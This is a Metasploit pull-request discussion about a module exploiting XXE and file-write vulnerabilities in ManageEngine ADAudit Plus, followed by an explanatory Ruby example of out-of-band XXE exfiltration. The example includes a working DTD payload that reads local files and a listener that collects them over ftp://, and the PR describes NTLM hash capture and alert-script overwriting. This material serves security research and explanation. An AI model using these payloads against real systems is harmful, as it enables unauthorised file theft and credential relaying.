Add ManageEngine ADAudit Plus auxiliary module for builds 7060 and prior #17132
Conversation
@ErikWynter Does this need updating to pull in the updates from #17133? Would love to review this and get this landed but think we need some reworking to ensure that we aren't duplicating work or using the incorrect functions. Adding the delayed tag until this is updated to use the updates from #17133.
@gwillcox-r7 hey yeah I'll need to update the branch to get those updates and then adjust some of the code to utilize the final version of the mixin. Before I do that though, I wanted to ask you about the code reuse between this PR and the manageengine_adaudit_plus_cve_2022_28219. This PR uses almost the exact same code for the XXE FTP server, so I was wondering if you'd prefer me to move that to a mixin, or if it's okay like this? The mixin option would prevent code reuse but would of course require a lot more work, including changes to the
For the XXE FTP server code, if you reasonably believe that it could be something that would be generic enough to be used across multiple modules, and we don't have existing code for it already, I'd strongly recommend putting it into a mixin/library to ease future module developers' efforts. If however you think it's just the case that these two happened to need this code but it's not a generic technique that other exploits might use, then I'd be okay with it being reused so long as we noted this somewhere.
@gwillcox-r7 thanks, yeah honestly I think this is a relatively isolated case. While the technique on paper could work against various Java apps, it seems exceedingly rare. The reason both modules use the same code is that they exploit the same vulnerability type in the exact same product. So based on what you mention I think we can just keep it in the module for now. If we start seeing this more often, a library is always still a possibility, but I highly doubt that
Sounds good to me!
@ErikWynter any updates on pulling that code in?
@bwatters-r7 thanks for the reminder, I keep forgetting about this one. I'll try and push the required changes for it this week or the next.
Hey I didn't forget about this but I haven't been able to find the time. I'll keep trying though.
Was just running through the PR queue to see what's possible to land; do we want to temporarily close this pull request? Or can this land as an interim PR? 👀
@adfoster-r7 sorry for the continued delays on this. I haven't forgotten about this but I had some urgent projects I needed to wrap up first. I'm almost done with that and will get back to this PR after. I can't give an exact date, but I will make sure to push the required changes in December. Would that work?
I'm going to attic this until you're able to get back around to it. When that time comes just let one of us know and we'd be happy to reopen it for you!
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it. What does this generally mean? It could be one or more of several things:
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
@smcintyre-r7 hey yeah that makes sense. I haven't forgotten about it, but I have no clue when I'll have time again. Thanks!
About
This change adds an auxiliary module (with docs) that exploits unauthenticated XXE (CVE-2021-42847 and CVE-2022-28219) and arbitrary file write (CVE-2021-42847) vulnerabilities in ManageEngine ADAudit Plus in order to perform a variety of unauthenticated actions, including arbitrary file read, arbitrary file write and triggering Net-NTLM authentication.
The following five actions are supported:
- `READ_FILE_OR_DIR`: Read the contents of a file or directory specified via `FILE_OR_DIR_PATH`.
- `WRITE_FILE`: Write a JSON-compatible (UTF-8) payload to a file specified via `FILE_OR_DIR_PATH`.
- `LIST_ALERT_SCRIPTS`: Locate and list the contents of `<install_dir>/alert_scripts/` if this directory exists.
- `OVERWRITE_ALERT_SCRIPT`: Overwrite the contents of an existing PowerShell script in `<install_dir>/alert_scripts/` with a payload.
- `TRIGGER_NTLM_AUTH`: Trigger Net-NTLM authentication from the target (for hash capture/relaying via Responder, impacket-ntlmrelayx, etc.).
This module has been successfully tested against ManageEngine ADAudit Plus 7005 running on Windows Server 2012 R2.
Vulnerable Application
The `WRITE_FILE` and `OVERWRITE_ALERT_SCRIPT` actions can be used to target ManageEngine ADAudit Plus builds prior to 7006. The `READ_FILE_OR_DIR`, `LIST_ALERT_SCRIPTS` and `TRIGGER_NTLM_AUTH` actions affect builds prior to 7060 if the `XXE_VECTOR` option is set to `CVE-2022-28219` (default).
Writeup and demo videos
I have published a writeup that covers the attacks that this module exploits.
In addition, I have created the following demo videos:
1. `READ_FILE_OR_DIR` action
2. `WRITE_FILE` action
3. `TRIGGER_NTLM_AUTH` action
4. `LIST_ALERT_SCRIPTS` and `OVERWRITE_ALERT_SCRIPT` actions
Conditional unauthenticated RCE
It should be noted that under certain non-default circumstances, the `LIST_ALERT_SCRIPTS` and `OVERWRITE_ALERT_SCRIPT` actions can be used as part of a broader attempt to achieve unauthenticated RCE on ADAudit Plus builds 7004 and 7005. The requirements for this are detailed in my writeup, and video 4 (see previous section) shows what the full attack could look like in practice.
Overlap with manageengine_adaudit_plus_cve_2022_28219
This module uses quite a lot of code that is currently part of the `manageengine_adaudit_plus_cve_2022_28219` exploit module by @rbowes-r7. This is because aspects of this module cover the same vulnerability (CVE-2022-28219). More specifically, the `READ_FILE_OR_DIR` and `LIST_ALERT_SCRIPTS` actions take advantage of the same XXE FTP server used in that module in order to obtain directory listings and file contents. It would probably make sense to move most of the duplicate code to a mixin. I'd be happy to do the heavy lifting for that.
Installation Information
Vulnerable versions of ADAudit Plus are available here.
After running the installer, you can launch ADAudit Plus by opening Command Prompt with administrator privileges
and then running:
<install_dir>\bin\run.bat
Scenarios
ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - `READ_FILE_OR_DIR`
ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - `WRITE_FILE`
ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - `LIST_ALERT_SCRIPTS`
`OVERWRITE_ALERT_SCRIPT`
`TRIGGER_NTLM_AUTH`
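The "XXE FTP server" that the PR description and the review discussion keep referring to is the standard out-of-band exfiltration trick against Java XML parsers: an external DTD makes the parser read a local file into a parameter entity and then resolve an `ftp://` URL whose path is that file's contents, so the file travels to the attacker inside FTP commands. The listener below is an added, self-contained illustration of that mechanism; it is not the module's code, not Metasploit's mixin, and not captured traffic. The DTD layout, the `127.0.0.1` listener, the emulated client behaviour (`USER`/`PASS`, then a single `CWD` whose argument still carries the file's own line breaks) and the sample file contents are all assumptions made for the example.

```ruby
require 'socket'

# Added illustration of XXE out-of-band exfiltration over FTP.
# Not the module's code: the DTD layout, the emulated Java client and
# the sample data are assumptions made for this example.
class XxeFtpListener
  attr_reader :port, :fragments

  def initialize(host = '127.0.0.1', port = 0)
    @server = TCPServer.new(host, port)   # port 0 = pick any free port
    @port = @server.addr[1]
    @fragments = []                       # lines of the leaked file
  end

  # External DTD for the XXE: %file; becomes the target's contents, and
  # %send; turns them into the path of an ftp:// URL pointing at us.
  def dtd(target_path)
    <<~DTD
      <!ENTITY % file SYSTEM "file:///#{target_path}">
      <!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'ftp://#{@server.addr[3]}:#{@port}/%file;'>">
      %wrap;
      %send;
    DTD
  end

  def start
    @thread = Thread.new { serve(@server.accept) }
  end

  def wait(timeout = 5)
    @thread.join(timeout)
    @server.close
  end

  def leaked_content
    @fragments.join("\n")
  end

  private

  # Answer everything with a success code so the client keeps talking.
  # Before login every line gets 230; afterwards every non-control line is
  # treated as leaked data (a leaked line that itself starts with TYPE/PASV/
  # EPSV/PORT would be dropped; that is the accepted trade-off).
  def serve(client)
    client.write("220 xxe-oob ready\r\n")
    logged_in = false
    while (line = client.gets)
      line = line.chomp                    # also strips \r\n from Windows files
      if !logged_in
        logged_in = true if line.start_with?('PASS')
        client.write("230 ok\r\n")
      elsif line.start_with?('QUIT')
        client.write("221 bye\r\n")
        break
      elsif line =~ /\A(TYPE|PASV|EPSV|PORT)\b/
        client.write("200 ok\r\n")         # transfer-mode chatter, not data
      else
        # First data line arrives as "CWD <line>" (or "RETR <line>"); the
        # lines after the embedded newlines arrive bare.
        @fragments << line.sub(/\A(CWD|RETR) /, '')
        client.write("250 ok\r\n")
      end
    end
  ensure
    client.close
  end
end

# Emulated client: assumed behaviour of a Java ftp: handler fetching a URL
# whose path is the leaked file. Stands in for a real target in this example.
def emulate_java_ftp_fetch(port, leaked)
  sock = TCPSocket.new('127.0.0.1', port)
  sock.gets                                    # 220 banner
  sock.write("USER anonymous\r\n"); sock.gets  # 230
  sock.write("PASS java\r\n");      sock.gets  # 230
  sock.write("CWD #{leaked}\r\nQUIT\r\n")      # line breaks split the command
  sock.read                                    # drain replies until close
ensure
  sock&.close
end

# Constructed sample standing in for a Windows INI file read via the XXE.
SAMPLE_FILE = "[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]".freeze

# Run listener and emulated client end to end; returns the reconstructed file.
def demo(leaked = SAMPLE_FILE)
  listener = XxeFtpListener.new
  listener.start
  emulate_java_ftp_fetch(listener.port, leaked)
  listener.wait
  listener.leaked_content
end

puts demo if $PROGRAM_NAME == __FILE__
```

The point worth taking from the exchange is why the server answers every command with a success code: the parser only keeps sending the next line of the file while the previous FTP command appears to succeed, so a strict FTP implementation would truncate the leak after the first line. This also explains why the technique is tied to the runtime rather than the product: it depends on the JRE's `ftp:` handler passing line breaks from the entity straight into the command stream, which more recent Java releases refuse to do, so against a patched runtime the same DTD yields at most a single line.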